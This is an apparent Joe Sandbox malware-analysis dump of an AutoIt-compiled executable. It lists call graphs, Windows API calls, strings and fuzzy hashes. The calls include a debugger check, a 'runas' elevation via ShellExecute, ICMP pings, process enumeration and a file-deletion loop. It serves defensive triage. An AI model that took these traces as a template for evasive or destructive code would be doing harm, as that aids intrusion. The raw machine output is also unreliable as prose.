100260->100264 100265 3009c2 100260->100265 100269 2c4e28 100261->100269 100266 300a35 100262->100266 100267 2c4df0 100262->100267 100263 2c4e1a DefWindowProcW 100263->100269 100270 2c4e65 SetTimer RegisterWindowMessageW 100264->100270 100271 2c4e42 100264->100271 100268 2bc460 10 API calls 100265->100268 100312 312cce 97 API calls 100266->100312 100272 2c4df8 100267->100272 100273 2c4eb7 100267->100273 100276 3009e9 100268->100276 100270->100269 100274 2c4e8e CreatePopupMenu 100270->100274 100277 300965 100271->100277 100278 2c4e49 KillTimer 100271->100278 100279 300a1a 100272->100279 100280 2c4e03 100272->100280 100302 2c5b29 100273->100302 100274->100269 100282 2bc483 275 API calls 100276->100282 100284 30096a 100277->100284 100285 30099e MoveWindow 100277->100285 100286 2c5ac3 Shell_NotifyIconW 100278->100286 100279->100263 100311 308854 59 API calls 100279->100311 100287 2c4e0e 100280->100287 100288 2c4e9b 100280->100288 100281 300a47 100281->100263 100281->100269 100282->100287 100289 30098d SetFocus 100284->100289 100290 30096e 100284->100290 100285->100269 100291 2c4e5c 100286->100291 100287->100263 100299 2c5ac3 Shell_NotifyIconW 100287->100299 100310 2c5bd7 107 API calls 100288->100310 100289->100269 100290->100287 100295 300977 100290->100295 100309 2b34e4 DeleteObject DestroyWindow 100291->100309 100298 2bc460 10 API calls 100295->100298 100296->100263 100297 2c4eab 100297->100269 100298->100269 100300 300a0e 100299->100300 100301 2c59d3 94 API calls 100300->100301 100301->100296 100303 2c5b40 100302->100303 100304 2c5bc2 100302->100304 100305 2c56f8 87 API calls 100303->100305 100304->100269 100307 2c5b67 100305->100307 100306 2c5bab KillTimer SetTimer 100306->100304 100307->100306 100308 300d6e Shell_NotifyIconW 100307->100308 100308->100306 100309->100269 100310->100297 100311->100296 100312->100281 100313 2ee438 100320 2b6152 100313->100320 100314 2b6af8 100379 31a48d 89 API calls 100314->100379 100316 2eefeb 100380 306cf1 59 API calls 100316->100380 100318 2eeff4 100319 2b5190 59 API calls 100319->100320 100320->100314 100320->100316 100320->100318 100320->100319 100321 2ee2e9 VariantClear 100320->100321 100323 32f1b2 91 API calls 100320->100323 100326 32e60c 130 API calls 100320->100326 100328 32ebba 100320->100328 100334 325e1d 100320->100334 100359 2bcfd7 100320->100359 100378 307aad 59 API calls 100320->100378 100321->100320 100323->100320 100326->100320 100329 32ebcd 100328->100329 100330 2b4d37 84 API calls 100329->100330 100333 32ebdc 100329->100333 100331 32ec0a 100330->100331 100381 317ce4 100331->100381 100333->100320 100335 325e46 100334->100335 100336 325e74 WSAStartup 100335->100336 100435 2b502b 59 API calls 100335->100435 100337 325e9d 100336->100337 100348 325e88 100336->100348 100422 2c40cd 100337->100422 100340 325e61 100340->100336 100436 2b502b 59 API calls 100340->100436 100343 2b4d37 84 API calls 100345 325eb2 100343->100345 100344 325e70 100344->100336 100427 2c402a WideCharToMultiByte 100345->100427 100347 325ebf inet_addr gethostbyname 100347->100348 100349 325edd IcmpCreateFile 100347->100349 100348->100320 100349->100348 100350 325f01 100349->100350 100351 2d0fe6 59 API calls 100350->100351 100352 325f1a 100351->100352 100353 2c433f 59 API calls 100352->100353 100354 325f25 100353->100354 100355 325f34 IcmpSendEcho 100354->100355 100356 325f55 IcmpSendEcho 100354->100356 100357 325f6d 100355->100357 100356->100357 100358 325fd4 IcmpCloseHandle WSACleanup 100357->100358 100358->100348 100360 2b4d37 84 API calls 100359->100360 100361 2bd001 100360->100361 100362 2b5278 59 API calls 100361->100362 100363 2bd018 100362->100363 100364 2bd57b 100363->100364 100373 2bd439 100363->100373 100439 2b502b 59 API calls 100363->100439 100364->100320 100366 2d312d 60 API calls 100366->100373 100367 2d0c65 62 API calls 100367->100373 100368 2c162d 59 API calls 100368->100373 100369 2b4f98 59 API calls 100369->100373 100372 2b4d37 84 API calls 100372->100373 100373->100364 100373->100366 100373->100367 100373->100368 100373->100369 100373->100372 100374 2b502b 59 API calls 100373->100374 100375 2c1821 59 API calls 100373->100375 100376 2c59d3 94 API calls 100373->100376 100377 2c5ac3 Shell_NotifyIconW 100373->100377 100440 2c153b 59 API calls 100373->100440 100441 2b4f3c 59 API calls 100373->100441 100374->100373 100375->100373 100376->100373 100377->100373 100378->100320 100379->100316 100380->100318 100382 317cf1 100381->100382 100383 2d0fe6 59 API calls 100382->100383 100384 317cf8 100383->100384 100387 316135 100384->100387 100386 317d3b 100386->100333 100388 2c1aa4 59 API calls 100387->100388 100389 316148 CharLowerBuffW 100388->100389 100392 31615b 100389->100392 100390 316165 100390->100386 100391 316195 100394 3161a7 100391->100394 100396 2c1609 59 API calls 100391->100396 100392->100390 100392->100391 100393 2c1609 59 API calls 100392->100393 100393->100392 100395 2d0fe6 59 API calls 100394->100395 100400 3161d5 100395->100400 100396->100394 100397 3161f4 100405 316292 100397->100405 100400->100397 100420 316071 59 API calls 100400->100420 100401 316233 100401->100390 100402 2d0fe6 59 API calls 100401->100402 100403 31624d 100402->100403 100404 2d0fe6 59 API calls 100403->100404 100404->100390 100406 2c1207 59 API calls 100405->100406 100407 3162c4 100406->100407 100408 2c1207 59 API calls 100407->100408 100409 3162cd 100408->100409 100410 2c1207 59 API calls 100409->100410 100417 3162d6 100410->100417 100411 2c1821 59 API calls 100411->100417 100412 2d3836 GetStringTypeW 100412->100417 100413 2c153b 59 API calls 100413->100417 100415 2d37ba 59 API calls 100415->100417 100416 316292 60 API calls 100416->100417 100417->100411 100417->100412 100417->100413 100417->100415 100417->100416 100418 3165ab 100417->100418 100419 2c1c9c 59 API calls 100417->100419 100421 2d385c GetStringTypeW 100417->100421 100418->100401 100419->100417 100420->100400 100421->100417 100423 2d0fe6 59 API calls 100422->100423 100424 2c40e0 100423->100424 100425 2c1c7e 59 API calls 100424->100425 100426 2c40ed 100425->100426 100426->100343 100428 2c404e 100427->100428 100429 2c4085 100427->100429 100430 2d0fe6 59 API calls 100428->100430 100438 2c3f20 59 API calls 100429->100438 100432 2c4055 WideCharToMultiByte 100430->100432 100437 2c3f79 59 API calls 100432->100437 100434 2c4077 100434->100347 100435->100340 100436->100344 100437->100434 100438->100434 100439->100373 100440->100373 100441->100373 100442 2b107d 100447 2c2fc5 100442->100447 100444 2b108c 100445 2d2f70 67 API calls 100444->100445 100446 2b1096 100445->100446 100448 2c2fd5 100447->100448 100449 2c1207 59 API calls 100448->100449 100450 2c308b 100449->100450 100451 2d00cf 61 API calls 100450->100451 100452 2c3094 100451->100452 100478 2d08c1 100452->100478 100455 2c1900 59 API calls 100456 2c30ad 100455->100456 100457 2c4c94 59 API calls 100456->100457 100458 2c30bc 100457->100458 100459 2c1207 59 API calls 100458->100459 100460 2c30c5 100459->100460 100461 2c19e1 59 API calls 100460->100461 100462 2c30ce RegOpenKeyExW 100461->100462 100463 3001a3 RegQueryValueExW 100462->100463 100467 2c30f0 100462->100467 100464 3001c0 100463->100464 100465 300235 RegCloseKey 100463->100465 100466 2d0fe6 59 API calls 100464->100466 100465->100467 100475 300247 100465->100475 100468 3001d9 100466->100468 100467->100444 100470 2c433f 59 API calls 100468->100470 100469 2c1609 59 API calls 100469->100475 100471 3001e4 RegQueryValueExW 100470->100471 100472 300201 100471->100472 100474 30021b 100471->100474 100473 2c1821 59 API calls 100472->100473 100473->100474 100474->100465 100475->100467 100475->100469 100476 2c1a36 59 API calls 100475->100476 100477 2c4c94 59 API calls 100475->100477 100476->100475 100477->100475 100479 2e1b70 100478->100479 100480 2d08ce GetFullPathNameW 100479->100480 100481 2d08f0 100480->100481 100482 2c1821 59 API calls 100481->100482 100483 2c309f 100482->100483 100483->100455 100484 3192c8 100485 3192d5 100484->100485 100487 3192db 100484->100487 100486 2d2f85 58 API calls 100485->100486 100486->100487 100488 3192ec 100487->100488 100489 2d2f85 58 API calls 100487->100489 100490 3192fe 100488->100490 100491 2d2f85 58 API calls 100488->100491 100489->100488 100491->100490 100492 2b7357 100493 2b78f5 100492->100493 100494 2b7360 100492->100494 100497 2b6fdb 100493->100497 100503 3087f9 59 API calls 100493->100503 100494->100493 100495 2b4d37 84 API calls 100494->100495 100496 2b738b 100495->100496 100496->100493 100498 2b739b 100496->100498 100500 2c1680 59 API calls 100498->100500 100500->100497 100501 2ef91b 100502 2c1c9c 59 API calls 100501->100502 100502->100497 100503->100501 100504 2b1016 100509 2c5ce7 100504->100509 100507 2d2f70 67 API calls 100508 2b1025 100507->100508 100510 2d0fe6 59 API calls 100509->100510 100511 2c5cef 100510->100511 100512 2b101b 100511->100512 100516 2c5f39 100511->100516 100512->100507 100517 2c5cfb 100516->100517 100518 2c5f42 100516->100518 100520 2c5d13 100517->100520 100519 2d2f70 67 API calls 100518->100519 100519->100517 100521 2c1207 59 API calls 100520->100521 100522 2c5d2b GetVersionExW 100521->100522 100523 2c1821 59 API calls 100522->100523 100524 2c5d6e 100523->100524 100525 2c1981 59 API calls 100524->100525 100530 2c5d9b 100524->100530 100526 2c5d8f 100525->100526 100527 2c133d 59 API calls 100526->100527 100527->100530 100528 2c5e00 GetCurrentProcess IsWow64Process 100529 2c5e19 100528->100529 100532 2c5e2f 100529->100532 100533 2c5e98 GetSystemInfo 100529->100533 100530->100528 100531 301098 100530->100531 100544 2c55f0 100532->100544 100534 2c5e65 100533->100534 100534->100512 100537 2c5e8c GetSystemInfo 100539 2c5e56 100537->100539 100538 2c5e41 100540 2c55f0 2 API calls 100538->100540 100539->100534 100541 2c5e5c FreeLibrary 100539->100541 100542 2c5e49 GetNativeSystemInfo 100540->100542 100541->100534 100542->100539 100545 2c5619 100544->100545 100546 2c55f9 LoadLibraryA 100544->100546 100545->100537 100545->100538 100546->100545 100547 2c560a GetProcAddress 100546->100547 100547->100545 100548 2b1055 100553 2b2a19 100548->100553 100551 2d2f70 67 API calls 100552 2b1064 100551->100552 100554 2c1207 59 API calls 100553->100554 100555 2b2a87 100554->100555 100560 2b1256 100555->100560 100557 2b2b24 100558 2b105a 100557->100558 100563 2b13f8 59 API calls 100557->100563 100558->100551 100564 2b1284 100560->100564 100563->100557 100565 2b1275 100564->100565 100566 2b1291 100564->100566 100565->100557 100566->100565 100567 2b1298 RegOpenKeyExW 100566->100567 100567->100565 100568 2b12b2 RegQueryValueExW 100567->100568 100569 2b12e8 RegCloseKey 100568->100569 100570 2b12d3 100568->100570 100569->100565 100570->100569 100571 2b5ff5 100595 2b5ede 100571->100595 100572 2d0fe6 59 API calls 100572->100595 100573 2b6a9b 100639 2ba9de 275 API calls 100573->100639 100574 2b53b0 275 API calls 100574->100595 100576 2eeff9 100577 2b5190 59 API calls 100576->100577 100582 2eefeb 100577->100582 100578 2ef007 100651 31a48d 89 API calls 100578->100651 100629 2b5569 100582->100629 100650 306cf1 59 API calls 100582->100650 100583 2b60e5 100584 2ee137 100583->100584 100588 2b63bd 100583->100588 100596 2b6abc 100583->100596 100612 2b6152 100583->100612 100584->100588 100640 307aad 59 API calls 100584->100640 100585 2c1c9c 59 API calls 100585->100595 100587 2c1a36 59 API calls 100587->100595 100589 2d0fe6 59 API calls 100588->100589 100600 2b6426 100588->100600 100592 2b63d1 100589->100592 100590 2b523c 59 API calls 100590->100595 100594 2b63de 100592->100594 100592->100596 100593 32c355 275 API calls 100593->100595 100597 2b6413 100594->100597 100598 2ee172 100594->100598 100595->100572 100595->100573 100595->100574 100595->100576 100595->100578 100595->100583 100595->100585 100595->100587 100595->100590 100595->100593 100595->100596 100595->100629 100643 317f11 59 API calls 100595->100643 100644 306cf1 59 API calls 100595->100644 100649 31a48d 89 API calls 100596->100649 100597->100600 100628 2b5447 100597->100628 100641 32c87c 85 API calls 100598->100641 100642 32c9c9 95 API calls 100600->100642 100604 2ee19d 100604->100604 100605 2ef165 100653 31a48d 89 API calls 100605->100653 100606 2ee691 100646 31a48d 89 API calls 100606->100646 100607 2b5190 59 API calls 100607->100612 100609 2b6e30 60 API calls 100609->100628 100610 2b69fa 100615 2c1c9c 59 API calls 100610->100615 100612->100582 100612->100596 100612->100607 100616 2ee2e9 VariantClear 100612->100616 100612->100629 100633 32f1b2 91 API calls 100612->100633 100634 32ebba 86 API calls 100612->100634 100635 2bcfd7 98 API calls 100612->100635 100636 32e60c 130 API calls 100612->100636 100637 325e1d 95 API calls 100612->100637 100645 307aad 59 API calls 100612->100645 100613 2ee6a0 100614 2d0fe6 59 API calls 100614->100628 100615->100629 100616->100612 100618 2eea9a 100623 2c1c9c 59 API calls 100618->100623 100619 2b69ff 100619->100605 100619->100606 100620 2c1c9c 59 API calls 100620->100628 100621 2c1207 59 API calls 100621->100628 100623->100629 100624 2d2f70 67 API calls 100624->100628 100625 2eeb67 100625->100629 100647 307aad 59 API calls 100625->100647 100626 307aad 59 API calls 100626->100628 100628->100606 100628->100609 100628->100610 100628->100614 100628->100618 100628->100619 100628->100620 100628->100621 100628->100624 100628->100625 100628->100626 100628->100629 100630 2eef28 100628->100630 100632 2b5a1a 100628->100632 100638 2b7e50 275 API calls 100628->100638 100648 31a48d 89 API calls 100630->100648 100652 31a48d 89 API calls 100632->100652 100633->100612 100634->100612 100635->100612 100636->100612 100637->100612 100638->100628 100639->100596 100640->100588 100641->100600 100642->100604 100643->100595 100644->100595 100645->100612 100646->100613 100647->100629 100648->100632 100649->100582 100650->100629 100651->100582 100652->100629 100653->100629

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002C526C
                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 002C527E
                                                                                                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002C52E6
                                                                                                                                                                  • Part of subcall function 002BBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002BBC07
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 002C5366
                                                                                                                                                                • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00300B2E
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00300B66
                                                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00366D10), ref: 00300BE9
                                                                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00300BF0
                                                                                                                                                                  • Part of subcall function 002C514C: GetSysColorBrush.USER32(0000000F), ref: 002C5156
                                                                                                                                                                  • Part of subcall function 002C514C: LoadCursorW.USER32(00000000,00007F00), ref: 002C5165
                                                                                                                                                                  • Part of subcall function 002C514C: LoadIconW.USER32(00000063), ref: 002C517C
                                                                                                                                                                  • Part of subcall function 002C514C: LoadIconW.USER32(000000A4), ref: 002C518E
                                                                                                                                                                  • Part of subcall function 002C514C: LoadIconW.USER32(000000A2), ref: 002C51A0
                                                                                                                                                                  • Part of subcall function 002C514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002C51C6
                                                                                                                                                                  • Part of subcall function 002C514C: RegisterClassExW.USER32(?), ref: 002C521C
                                                                                                                                                                  • Part of subcall function 002C50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002C5109
                                                                                                                                                                  • Part of subcall function 002C50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002C512A
                                                                                                                                                                  • Part of subcall function 002C50DB: ShowWindow.USER32(00000000), ref: 002C513E
                                                                                                                                                                  • Part of subcall function 002C50DB: ShowWindow.USER32(00000000), ref: 002C5147
                                                                                                                                                                  • Part of subcall function 002C59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002C5A9E
                                                                                                                                                                Strings
                                                                                                                                                                • AutoIt, xrefs: 00300B23
                                                                                                                                                                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00300B28
                                                                                                                                                                • runas, xrefs: 00300BE4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                                                                                                                                • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                • API String ID: 1385234928-2030392706
                                                                                                                                                                • Opcode ID: 641b41deafe8a4a59551d8623b13cd37efecc5618c5f64ee27cbef16eca59cbf
                                                                                                                                                                • Instruction ID: 5c4fb4090848091577dbbada13a7ac2370dac6b75a06689b94337e5f9ca35361
                                                                                                                                                                • Opcode Fuzzy Hash: 641b41deafe8a4a59551d8623b13cd37efecc5618c5f64ee27cbef16eca59cbf
                                                                                                                                                                • Instruction Fuzzy Hash: 90511E34914248AECB13EBB0DC16FED7B78AB05340F10466DF555661A3CEB4A5A5CF11

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1589 2c5d13-2c5d73 call 2c1207 GetVersionExW call 2c1821 1594 2c5e78-2c5e7a 1589->1594 1595 2c5d79 1589->1595 1596 300fa9-300fb5 1594->1596 1597 2c5d7c-2c5d81 1595->1597 1598 300fb6-300fba 1596->1598 1599 2c5e7f-2c5e80 1597->1599 1600 2c5d87 1597->1600 1602 300fbc 1598->1602 1603 300fbd-300fc9 1598->1603 1601 2c5d88-2c5dbf call 2c1981 call 2c133d 1599->1601 1600->1601 1612 301098-30109b 1601->1612 1613 2c5dc5-2c5dc6 1601->1613 1602->1603 1603->1598 1604 300fcb-300fd0 1603->1604 1604->1597 1606 300fd6-300fdd 1604->1606 1606->1596 1609 300fdf 1606->1609 1611 300fe4-300fea 1609->1611 1614 2c5e00-2c5e17 GetCurrentProcess IsWow64Process 1611->1614 1615 3010b4-3010b8 1612->1615 1616 30109d 1612->1616 1617 2c5dcc-2c5dcf 1613->1617 1618 300fef-300ffa 1613->1618 1623 2c5e1c-2c5e2d 1614->1623 1624 2c5e19 1614->1624 1625 3010a3-3010ac 1615->1625 1626 3010ba-3010c3 1615->1626 1621 3010a0 1616->1621 1617->1614 1622 2c5dd1-2c5def 1617->1622 1619 301017-301019 1618->1619 1620 300ffc-301002 1618->1620 1630 30101b-301027 1619->1630 1631 30103c-30103f 1619->1631 1627 301004-301007 1620->1627 1628 30100c-301012 1620->1628 1621->1625 1622->1614 1629 2c5df1-2c5df7 1622->1629 1633 2c5e2f-2c5e3f call 2c55f0 1623->1633 1634 2c5e98-2c5ea2 GetSystemInfo 1623->1634 1624->1623 1625->1615 1626->1621 1632 3010c5-3010c8 1626->1632 1627->1614 1628->1614 1629->1611 1635 2c5dfd 1629->1635 1636 301031-301037 1630->1636 1637 301029-30102c 1630->1637 1639 301041-301050 1631->1639 1640 301065-301068 1631->1640 1632->1625 1648 2c5e8c-2c5e96 GetSystemInfo 1633->1648 1649 2c5e41-2c5e4e call 2c55f0 1633->1649 1638 2c5e65-2c5e75 1634->1638 1635->1614 1636->1614 1637->1614 1642 301052-301055 1639->1642 1643 30105a-301060 1639->1643 1640->1614 1645 30106e-301083 1640->1645 1642->1614 1643->1614 1646 301085-301088 1645->1646 1647 30108d-301093 1645->1647 1646->1614 1647->1614 1650 2c5e56-2c5e5a 1648->1650 1654 2c5e85-2c5e8a 1649->1654 1655 2c5e50-2c5e54 GetNativeSystemInfo 1649->1655 1650->1638 1652 2c5e5c-2c5e5f FreeLibrary 1650->1652 1652->1638 1654->1655 1655->1650
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 002C5D40
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00340A18,00000000,00000000,?), ref: 002C5E07
                                                                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 002C5E0E
                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(00000000), ref: 002C5E54
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 002C5E5F
                                                                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 002C5E90
                                                                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 002C5E9C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2813406015-0
                                                                                                                                                                • Opcode ID: e4b73a267134e2954a86e565e0c01b1c91535002da5e8ea1ec9ae436db5e2514
                                                                                                                                                                • Instruction ID: 352e48a2689d69e8b529df9799b590492ecde7c77b5519e4cab3a3c5b1a3684b
                                                                                                                                                                • Opcode Fuzzy Hash: e4b73a267134e2954a86e565e0c01b1c91535002da5e8ea1ec9ae436db5e2514
                                                                                                                                                                • Instruction Fuzzy Hash: 8B91D53155ABD0DEC732CB688450AABBFE56F26300F880A5ED0C797A42D630F598D799

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1697 314005-31404c call 2c1207 * 3 call 2d0284 call 314fec 1708 31405c-31408d call 2d0119 FindFirstFileW 1697->1708 1709 31404e-314057 call 2c1900 1697->1709 1713 3140fc-314103 FindClose 1708->1713 1714 31408f-314091 1708->1714 1709->1708 1715 314107-314129 call 2c1cb6 * 3 1713->1715 1714->1713 1716 314093-314098 1714->1716 1718 3140d7-3140e9 FindNextFileW 1716->1718 1719 31409a-3140d5 call 2c1c9c call 2c17e0 call 2c1900 DeleteFileW 1716->1719 1718->1714 1720 3140eb-3140f1 1718->1720 1719->1718 1732 3140f3-3140fa FindClose 1719->1732 1720->1714 1732->1715
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C2A58,?,00008000), ref: 002D02A4
                                                                                                                                                                  • Part of subcall function 00314FEC: GetFileAttributesW.KERNEL32(?,00313BFE), ref: 00314FED
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0031407C
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 003140CC
                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 003140DD
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 003140F4
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 003140FD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                                                                • Opcode ID: 7973418ab27de9ca8d33028154d44509541a24fd3dabff10e9d3eb58aed912bb
                                                                                                                                                                • Instruction ID: 238072a96f742cd65bcaea608a0e9840bf9b8cb52b9613491547756936bb9cf3
                                                                                                                                                                • Opcode Fuzzy Hash: 7973418ab27de9ca8d33028154d44509541a24fd3dabff10e9d3eb58aed912bb
                                                                                                                                                                • Instruction Fuzzy Hash: 6D3164350183859BC306EF60C896DEFB7ACBE5A304F444A1DF5D582192DB30DA29CB93
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0031416D
                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0031417B
                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0031419B
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00314245
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                • Opcode ID: 5516e974ef8ec14826c9567b772b0c808baeb0c1f08e0c91efd1b5d550de8f57
                                                                                                                                                                • Instruction ID: 276ccd8882da1f523697fd4a19d1689fecf3119251e138c3c501f07391e67f06
                                                                                                                                                                • Opcode Fuzzy Hash: 5516e974ef8ec14826c9567b772b0c808baeb0c1f08e0c91efd1b5d550de8f57
                                                                                                                                                                • Instruction Fuzzy Hash: 453188711083419FD305DF50D885FAFBBE8AF9A350F400A2DF585C61A1EB719A99CB92
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandleResumeThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3265327148-0
                                                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                • Instruction ID: b742c8ed3a63b54a1557d0b1fa45fac08a6f7d97df2ee44cc94c84956c85e973
                                                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                • Instruction Fuzzy Hash: 7C31B871A1010A9FD718DF59C4C0A69F7A5FF59300F648A96E409CB761D771EDD1CB80
                                                                                                                                                                APIs
                                                                                                                                                                • timeGetTime.WINMM ref: 002BBF57
                                                                                                                                                                  • Part of subcall function 002B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002B52E6
